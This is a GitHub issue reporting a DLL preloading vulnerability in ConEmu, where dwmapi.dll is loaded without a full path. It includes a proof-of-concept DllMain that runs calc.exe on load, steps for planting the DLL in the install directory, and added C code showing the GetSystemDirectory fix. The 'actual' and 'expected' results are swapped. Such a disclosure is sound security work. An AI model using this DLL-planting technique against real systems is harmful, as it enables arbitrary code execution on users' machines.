Attacker can execute arbitrary code using a DLL Preloading attack.
comalmot opened this issue · 1 comment
Versions
ConEmu build: v23.07.24 x64 (Portable Version : ConEmuPack.230724.7z )
OS version: Windows 11 Pro x64 (Build 22621)
Used shell version (Far Manager, git-bash, cmd, powershell, cygwin, whatever): Explorer.exe
Problem description
When ConEmu64.exe is executed, the CDwmHelper::InitDwm() method is invoked ( https://github.com/Maximus5/ConEmu/blob/master/src/ConEmu/DwmHelper.cpp ), and in this method, when loading dwmapi.dll, the LoadLibrary call has no flag to prevent DLL preloading.
ConEmu/src/ConEmu/DwmHelper.cpp
Line 111 in 740b09c
mh_DwmApi = LoadLibrary(_T("dwmapi.dll"));
So an attacker can move a malicious DLL file (named dwmapi.dll) into the directory where ConEmuPack is installed, and can execute arbitrary code.
Steps to reproduce
- Generate Malicious DLL File :
#include "pch.h"
#include "framework.h"
#include <Windows.h>

// Proof-of-concept DLL: when the process loads it, launch calc.exe.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        WinExec("cmd.exe /c calc.exe", SW_SHOW);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
This code invokes calc.exe.
- Put it in the directory where ConEmuPack is installed, named dwmapi.dll.
- Just click ConEmu64.exe.
Actual results
ConEmu.exe and ConEmu64.exe must not be affected by DLL preloading.
Expected results
ConEmu.exe and ConEmu64.exe are affected by DLL preloading.
Additional files
How to Solve
We can use an absolute path, and can use the GetSystemDirectory() function to combine the system directory path with the DLL file name (in this case, dwmapi.dll) to defend against it.
Sorry for my Bad English 😢
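The fix described above, written out as an added example (not ConEmu's own code and not the reporter's): the path-joining step is plain string logic so it can be checked anywhere, and the Windows loader call is only compiled under _WIN32. The helper names `build_system_dll_path` and `load_system_dll` are assumptions chosen for this example; `GetSystemDirectoryA`, `LoadLibraryA`, `LoadLibraryExA` and `LOAD_LIBRARY_SEARCH_SYSTEM32` are real Win32 APIs.

```c
/* Added example, not code from ConEmu: load dwmapi.dll only from the system
 * directory, as the issue suggests, instead of relying on the default search
 * order that consults the application directory first. */
#include <stddef.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#endif

/* Join a system directory and a bare DLL file name into an absolute path.
 * Returns 1 on success, 0 if the result would not fit in `out` (cap bytes)
 * or if `name` contains a path separator or drive letter (a caller passing
 * "..\\x.dll" would otherwise defeat the whole point). */
int build_system_dll_path(const char *sysdir, const char *name,
                          char *out, size_t cap)
{
    size_t dlen, nlen, need;
    int need_sep;

    if (!sysdir || !name || !out || cap == 0) return 0;
    if (strchr(name, '\\') || strchr(name, '/') || strchr(name, ':')) return 0;

    dlen = strlen(sysdir);
    nlen = strlen(name);
    if (dlen == 0 || nlen == 0) return 0;

    /* Add one separator unless sysdir already ends with a backslash. */
    need_sep = sysdir[dlen - 1] != '\\';
    need = dlen + (need_sep ? 1 : 0) + nlen + 1;   /* +1 for the NUL */
    if (need > cap) return 0;

    memcpy(out, sysdir, dlen);
    if (need_sep) out[dlen++] = '\\';
    memcpy(out + dlen, name, nlen + 1);
    return 1;
}

#ifdef _WIN32
/* Hardened replacement for LoadLibrary(_T("dwmapi.dll")): an absolute path
 * under the system directory means the loader never looks in the directory
 * ConEmu was started from. Returns NULL on any failure. */
HMODULE load_system_dll(const char *name)
{
    char sysdir[MAX_PATH];
    char path[MAX_PATH];
    UINT n = GetSystemDirectoryA(sysdir, MAX_PATH);

    /* n == 0 is an error; n >= MAX_PATH means the buffer was too small. */
    if (n == 0 || n >= MAX_PATH) return NULL;
    if (!build_system_dll_path(sysdir, name, path, sizeof path)) return NULL;

    /* Equivalent alternative on Windows 8+ (or Windows 7 with KB2533623):
     * LoadLibraryExA(name, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32); */
    return LoadLibraryA(path);
}
#endif
```

In ConEmu's case the call site would become `mh_DwmApi = load_system_dll("dwmapi.dll");` and the existing NULL check after it stays as it is, since DWM support is optional and the helper returns NULL when the library is unavailable.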
Thank you for raising the issue. I'll address this problem ASAP